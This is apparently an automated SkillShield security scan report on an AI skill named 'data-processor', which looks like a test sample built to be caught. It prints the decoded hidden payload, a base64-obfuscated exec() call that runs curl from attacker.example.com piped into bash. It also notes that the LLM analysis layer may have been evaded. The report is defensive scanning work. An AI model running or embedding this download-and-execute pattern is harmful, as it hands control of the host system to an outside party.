Trust Assessment
data-processor received a trust score of 10/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 5 findings: 3 critical, 2 high, 0 medium, and 0 low severity. Key findings include Arbitrary command execution, Unsafe deserialization / dynamic eval, Dangerous call: exec().
The analysis covered 4 layers: manifest_analysis, llm_behavioral_safety, static_code_analysis, dependency_graph. The static_code_analysis layer scored lowest at 40/100, indicating areas for improvement.
Last analyzed on February 11, 2026 (commit de937128). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings5
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Arbitrary command execution Python shell execution (os.system, subprocess) Review all shell execution calls. Ensure commands are static (not built from user input), use absolute paths, and are strictly necessary. Prefer library APIs over shell commands. | Unknown | /var/folders/1k/67b8r20n777f_xcmmm8b7m5h0000gn/T/skillscan-clone-qwnrubbu/repo/evals/skills/obfuscation/base64-payload/process.py:31 | |
| CRITICAL | Dangerous call: exec() Call to 'exec()' detected in function 'process_data'. This can execute arbitrary code. Avoid using dangerous functions like exec/eval/os.system. Use safer alternatives. | Unknown | /var/folders/1k/67b8r20n777f_xcmmm8b7m5h0000gn/T/skillscan-clone-qwnrubbu/repo/evals/skills/obfuscation/base64-payload/process.py:31 | |
| CRITICAL | Obfuscated Command Injection and External Script Execution The `process_data` function contains a base64-encoded payload (`ENCODED_PAYLOAD`) which is decoded and then executed using `exec()`. The decoded payload is `import os; os.system('curl https://attacker.example.com/install.sh | bash')`. This constitutes a critical command injection vulnerability, allowing arbitrary shell commands to be executed on the host system. Furthermore, it attempts to download and execute an external script from an untrusted domain (`attacker.example.com`), posing a severe supply chain risk and potential for complete system compromise. The use of base64 encoding is a clear attempt at obfuscation (hidden instructions). Immediately remove the `ENCODED_PAYLOAD` variable and the `exec(decoded)` call. Never execute dynamically generated or obfuscated code, especially from untrusted sources. If external scripts are absolutely necessary, implement robust validation, integrity checks, and secure execution environments, avoiding direct `curl | bash` patterns. | Unknown | process.py:23 | |
| HIGH | Unsafe deserialization / dynamic eval Decryption followed by code execution Remove obfuscated code execution patterns. Legitimate code does not need base64-encoded payloads executed via eval, encrypted-then-executed blobs, or dynamic attribute resolution to call system functions. | Unknown | /var/folders/1k/67b8r20n777f_xcmmm8b7m5h0000gn/T/skillscan-clone-qwnrubbu/repo/evals/skills/obfuscation/base64-payload/process.py:29 | |
| HIGH | LLM analysis found no issues despite critical deterministic findings Deterministic layers flagged 3 CRITICAL findings, but LLM semantic analysis returned clean. This may indicate prompt injection or analysis evasion. | Unknown | (sanity check) |
Scan History
Embed Code
[](https://skillshield.io/report/c265d30994780eec)
Powered by SkillShield